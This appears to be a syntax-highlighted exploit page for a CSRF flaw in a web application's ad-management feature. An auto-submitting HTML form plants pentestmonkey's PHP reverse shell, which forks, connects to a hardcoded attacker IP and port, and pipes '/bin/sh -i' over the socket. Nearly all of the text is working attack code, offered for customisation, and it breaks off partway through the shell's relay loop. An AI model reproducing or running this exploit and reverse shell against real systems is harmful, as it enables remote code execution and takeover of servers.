</span></span><span class="line"><span class="cl"><span class="n">PHP</span> <span class="n">Codes</span> <span class="n">In</span> <span class="n">Ads</span> <span class="ne">File</span>
</span></span><span class="line"><span class="cl"><span class="c1"># A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute</span>
</span></span><span class="line"><span class="cl"><span class="n">PHP</span> <span class="n">Codes</span> <span class="n">On</span> <span class="n">Server</span> <span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="c1"># In This Exploit I Just Added a echo &#39;&lt;h1&gt; Hacked &lt;/h1&gt;&#39;; phpinfo(); </span>
</span></span><span class="line"><span class="cl"><span class="n">Code</span> <span class="n">You</span> <span class="n">Can</span>
</span></span><span class="line"><span class="cl"><span class="n">Customize</span> <span class="n">Exploit</span> <span class="n">For</span> <span class="n">Your</span> <span class="n">Self</span> <span class="o">.</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Exploit :</span>
</span></span><span class="line"><span class="cl"><span class="o">--&gt;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">html</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">body</span> <span class="n">onload</span><span class="o">=</span><span class="s2">&#34;document.exploit.submit();&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">form</span> <span class="n">action</span><span class="o">=</span><span class="s2">&#34;http://10.10.111.161/content/as/?type=ad&amp;mode=save&#34;</span> <span class="n">method</span><span class="o">=</span><span class="s2">&#34;POST&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;exploit&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">input</span> <span class="n">type</span><span class="o">=</span><span class="s2">&#34;hidden&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;adk&#34;</span> <span class="n">value</span><span class="o">=</span><span class="s2">&#34;revshell&#34;</span><span class="o">/&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">textarea</span> <span class="n">type</span><span class="o">=</span><span class="s2">&#34;hidden&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;adv&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="err">?</span><span class="n">php</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">php</span><span class="o">-</span><span class="n">reverse</span><span class="o">-</span><span class="n">shell</span> <span class="o">-</span> <span class="n">A</span> <span class="n">Reverse</span> <span class="n">Shell</span> <span class="n">implementation</span> <span class="ow">in</span> <span class="n">PHP</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Copyright</span> <span class="p">(</span><span class="n">C</span><span class="p">)</span> <span class="mi">2007</span> <span class="n">pentestmonkey</span><span class="err">@</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="k">tool</span> <span class="n">may</span> <span class="n">be</span> <span class="n">used</span> <span class="k">for</span> <span class="n">legal</span> <span class="n">purposes</span> <span class="n">only</span><span class="o">.</span>  <span class="n">Users</span> <span class="n">take</span> <span class="n">full</span> <span class="n">responsibility</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">any</span> <span class="n">actions</span> <span class="n">performed</span> <span class="n">using</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">The</span> <span class="n">author</span> <span class="n">accepts</span> <span class="n">no</span> <span class="n">liability</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">damage</span> <span class="n">caused</span> <span class="n">by</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">If</span> <span class="n">these</span> <span class="n">terms</span> <span class="n">are</span> <span class="ow">not</span> <span class="n">acceptable</span> <span class="n">to</span> <span class="n">you</span><span class="p">,</span> <span class="n">then</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">do</span> <span class="ow">not</span> <span class="n">use</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">In</span> <span class="n">all</span> <span class="n">other</span> <span class="n">respects</span> <span class="n">the</span> <span class="n">GPL</span> <span class="n">version</span> <span class="mi">2</span> <span class="n">applies</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">program</span> <span class="n">is</span> <span class="n">free</span> <span class="n">software</span><span class="p">;</span> <span class="n">you</span> <span class="n">can</span> <span class="n">redistribute</span> <span class="n">it</span> <span class="ow">and</span><span class="o">/</span><span class="ow">or</span> <span class="n">modify</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">it</span> <span class="n">under</span> <span class="n">the</span> <span class="n">terms</span> <span class="n">of</span> <span class="n">the</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="n">version</span> <span class="mi">2</span> <span class="n">as</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">published</span> <span class="n">by</span> <span class="n">the</span> <span class="n">Free</span> <span class="n">Software</span> <span class="n">Foundation</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">program</span> <span class="n">is</span> <span class="n">distributed</span> <span class="ow">in</span> <span class="n">the</span> <span class="n">hope</span> <span class="n">that</span> <span class="n">it</span> <span class="n">will</span> <span class="n">be</span> <span class="n">useful</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">but</span> <span class="n">WITHOUT</span> <span class="n">ANY</span> <span class="n">WARRANTY</span><span class="p">;</span> <span class="n">without</span> <span class="n">even</span> <span class="n">the</span> <span class="n">implied</span> <span class="n">warranty</span> <span class="n">of</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">MERCHANTABILITY</span> <span class="ow">or</span> <span class="n">FITNESS</span> <span class="n">FOR</span> <span class="n">A</span> <span class="n">PARTICULAR</span> <span class="n">PURPOSE</span><span class="o">.</span>  <span class="n">See</span> <span class="n">the</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="k">for</span> <span class="n">more</span> <span class="n">details</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">You</span> <span class="n">should</span> <span class="n">have</span> <span class="n">received</span> <span class="n">a</span> <span class="n">copy</span> <span class="n">of</span> <span class="n">the</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="n">along</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">with</span> <span class="n">this</span> <span class="n">program</span><span class="p">;</span> <span class="k">if</span> <span class="ow">not</span><span class="p">,</span> <span class="n">write</span> <span class="n">to</span> <span class="n">the</span> <span class="n">Free</span> <span class="n">Software</span> <span class="n">Foundation</span><span class="p">,</span> <span class="n">Inc</span><span class="o">.</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="mi">51</span> <span class="n">Franklin</span> <span class="n">Street</span><span class="p">,</span> <span class="n">Fifth</span> <span class="n">Floor</span><span class="p">,</span> <span class="n">Boston</span><span class="p">,</span> <span class="n">MA</span> <span class="mi">02110</span><span class="o">-</span><span class="mi">1301</span> <span class="n">USA</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="k">tool</span> <span class="n">may</span> <span class="n">be</span> <span class="n">used</span> <span class="k">for</span> <span class="n">legal</span> <span class="n">purposes</span> <span class="n">only</span><span class="o">.</span>  <span class="n">Users</span> <span class="n">take</span> <span class="n">full</span> <span class="n">responsibility</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">any</span> <span class="n">actions</span> <span class="n">performed</span> <span class="n">using</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">If</span> <span class="n">these</span> <span class="n">terms</span> <span class="n">are</span> <span class="ow">not</span> <span class="n">acceptable</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">you</span><span class="p">,</span> <span class="n">then</span> <span class="k">do</span> <span class="ow">not</span> <span class="n">use</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">You</span> <span class="n">are</span> <span class="n">encouraged</span> <span class="n">to</span> <span class="n">send</span> <span class="n">comments</span><span class="p">,</span> <span class="n">improvements</span> <span class="ow">or</span> <span class="n">suggestions</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">me</span> <span class="n">at</span> <span class="n">pentestmonkey</span><span class="err">@</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Description</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----------</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">script</span> <span class="n">will</span> <span class="n">make</span> <span class="n">an</span> <span class="n">outbound</span> <span class="n">TCP</span> <span class="n">connection</span> <span class="n">to</span> <span class="n">a</span> <span class="n">hardcoded</span> <span class="ne">IP</span> <span class="ow">and</span> <span class="n">port</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">The</span> <span class="n">recipient</span> <span class="n">will</span> <span class="n">be</span> <span class="n">given</span> <span class="n">a</span> <span class="n">shell</span> <span class="n">running</span> <span class="n">as</span> <span class="n">the</span> <span class="n">current</span> <span class="n">user</span> <span class="p">(</span><span class="n">apache</span> <span class="n">normally</span><span class="p">)</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Limitations</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----------</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">proc_open</span> <span class="ow">and</span> <span class="n">stream_set_blocking</span> <span class="n">require</span> <span class="n">PHP</span> <span class="n">version</span> <span class="mf">4.3</span><span class="o">+</span><span class="p">,</span> <span class="ow">or</span> <span class="mi">5</span><span class="o">+</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Use</span> <span class="n">of</span> <span class="n">stream_select</span><span class="p">()</span> <span class="n">on</span> <span class="n">file</span> <span class="n">descriptors</span> <span class="n">returned</span> <span class="n">by</span> <span class="n">proc_open</span><span class="p">()</span> <span class="n">will</span> <span class="n">fail</span> <span class="ow">and</span> <span class="k">return</span> <span class="n">FALSE</span> <span class="n">under</span> <span class="n">Windows</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Some</span> <span class="n">compile</span><span class="o">-</span><span class="n">time</span> <span class="n">options</span> <span class="n">are</span> <span class="n">needed</span> <span class="k">for</span> <span class="n">daemonisation</span> <span class="p">(</span><span class="n">like</span> <span class="n">pcntl</span><span class="p">,</span> <span class="n">posix</span><span class="p">)</span><span class="o">.</span>  <span class="n">These</span> <span class="n">are</span> <span class="n">rarely</span> <span class="n">available</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Usage</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">See</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span><span class="o">/</span><span class="n">tools</span><span class="o">/</span><span class="n">php</span><span class="o">-</span><span class="n">reverse</span><span class="o">-</span><span class="n">shell</span> <span class="k">if</span> <span class="n">you</span> <span class="n">get</span> <span class="n">stuck</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">ip</span> <span class="o">=</span> <span class="s1">&#39;10.2.40.5&#39;</span><span class="p">;</span>  <span class="o">//</span> <span class="n">CHANGE</span> <span class="n">THIS</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">port</span> <span class="o">=</span> <span class="mi">9001</span><span class="p">;</span>       <span class="o">//</span> <span class="n">CHANGE</span> <span class="n">THIS</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">write_a</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">error_a</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Daemonise</span> <span class="n">ourself</span> <span class="k">if</span> <span class="n">possible</span> <span class="n">to</span> <span class="n">avoid</span> <span class="n">zombies</span> <span class="n">later</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">pcntl_fork</span> <span class="n">is</span> <span class="n">hardly</span> <span class="n">ever</span> <span class="n">available</span><span class="p">,</span> <span class="n">but</span> <span class="n">will</span> <span class="n">allow</span> <span class="n">us</span> <span class="n">to</span> <span class="n">daemonise</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">our</span> <span class="n">php</span> <span class="n">process</span> <span class="ow">and</span> <span class="n">avoid</span> <span class="n">zombies</span><span class="o">.</span>  <span class="n">Worth</span> <span class="n">a</span> <span class="n">try</span><span class="o">...</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">function_exists</span><span class="p">(</span><span class="s1">&#39;pcntl_fork&#39;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Fork</span> <span class="ow">and</span> <span class="n">have</span> <span class="n">the</span> <span class="n">parent</span> <span class="n">process</span> <span class="n">exit</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">pid</span> <span class="o">=</span> <span class="n">pcntl_fork</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">	
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t fork&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">pid</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>  <span class="o">//</span> <span class="n">Parent</span> <span class="n">exits</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Make</span> <span class="n">the</span> <span class="n">current</span> <span class="n">process</span> <span class="n">a</span> <span class="n">session</span> <span class="n">leader</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Will</span> <span class="n">only</span> <span class="n">succeed</span> <span class="k">if</span> <span class="n">we</span> <span class="n">forked</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">posix_setsid</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;Error: Can&#39;t setsid()&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">daemon</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;WARNING: Failed to daemonise.  This is quite common and not fatal.&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Change</span> <span class="n">to</span> <span class="n">a</span> <span class="n">safe</span> <span class="n">directory</span>
</span></span><span class="line"><span class="cl"><span class="n">chdir</span><span class="p">(</span><span class="s2">&#34;/&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Remove</span> <span class="n">any</span> <span class="n">umask</span> <span class="n">we</span> <span class="n">inherited</span>
</span></span><span class="line"><span class="cl"><span class="n">umask</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Do</span> <span class="n">the</span> <span class="n">reverse</span> <span class="n">shell</span><span class="o">...</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Open</span> <span class="n">reverse</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">sock</span> <span class="o">=</span> <span class="n">fsockopen</span><span class="p">(</span><span class="o">$</span><span class="n">ip</span><span class="p">,</span> <span class="o">$</span><span class="n">port</span><span class="p">,</span> <span class="o">$</span><span class="n">errno</span><span class="p">,</span> <span class="o">$</span><span class="n">errstr</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">!$</span><span class="n">sock</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;$errstr ($errno)&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Spawn</span> <span class="n">shell</span> <span class="n">process</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">descriptorspec</span> <span class="o">=</span> <span class="n">array</span><span class="p">(</span>
</span></span><span class="line"><span class="cl">   <span class="mi">0</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">),</span>  <span class="o">//</span> <span class="n">stdin</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">read</span> <span class="n">from</span>
</span></span><span class="line"><span class="cl">   <span class="mi">1</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">),</span>  <span class="o">//</span> <span class="n">stdout</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">write</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl">   <span class="mi">2</span> <span class="o">=&gt;</span> <span class="n">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">)</span>   <span class="o">//</span> <span class="n">stderr</span> <span class="n">is</span> <span class="n">a</span> <span class="n">pipe</span> <span class="n">that</span> <span class="n">the</span> <span class="n">child</span> <span class="n">will</span> <span class="n">write</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">process</span> <span class="o">=</span> <span class="n">proc_open</span><span class="p">(</span><span class="o">$</span><span class="n">shell</span><span class="p">,</span> <span class="o">$</span><span class="n">descriptorspec</span><span class="p">,</span> <span class="o">$</span><span class="n">pipes</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">is_resource</span><span class="p">(</span><span class="o">$</span><span class="n">process</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t spawn shell&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Set</span> <span class="n">everything</span> <span class="n">to</span> <span class="n">non</span><span class="o">-</span><span class="n">blocking</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Reason</span><span class="p">:</span> <span class="n">Occsionally</span> <span class="n">reads</span> <span class="n">will</span> <span class="n">block</span><span class="p">,</span> <span class="n">even</span> <span class="n">though</span> <span class="n">stream_select</span> <span class="n">tells</span> <span class="n">us</span> <span class="n">they</span> <span class="n">won</span><span class="s1">&#39;t</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">stream_set_blocking</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">printit</span><span class="p">(</span><span class="s2">&#34;Successfully opened reverse shell to $ip:$port&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">end</span> <span class="n">of</span> <span class="n">TCP</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">feof</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell connection terminated&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">end</span> <span class="n">of</span> <span class="n">STDOUT</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">feof</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell process terminated&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Wait</span> <span class="n">until</span> <span class="n">a</span> <span class="n">command</span> <span class="n">is</span> <span class="n">end</span> <span class="n">down</span> <span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="ow">or</span> <span class="n">some</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">command</span> <span class="n">output</span> <span class="n">is</span> <span class="n">available</span> <span class="n">on</span> <span class="n">STDOUT</span> <span class="ow">or</span> <span class="n">STDERR</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">read_a</span> <span class="o">=</span> <span class="n">array</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">num_changed_sockets</span> <span class="o">=</span> <span class="n">stream_select</span><span class="p">(</span><span class="o">$</span><span class="n">read_a</span><span class="p">,</span> <span class="o">$</span><span class="n">write_a</span><span class="p">,</span> <span class="o">$</span><span class="n">error_a</span><span class="p">,</span> <span class="n">null</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">TCP</span> <span class="n">socket</span><span class="p">,</span> <span class="n">send</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">data</span> <span class="n">to</span> <span class="n">process</span><span class="s1">&#39;s STDIN</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;SOCK READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;SOCK: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">process</span><span class="s1">&#39;s STDOUT</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">send</span> <span class="n">data</span> <span class="n">down</span> <span class="n">tcp</span> <span class="n">connection</span>
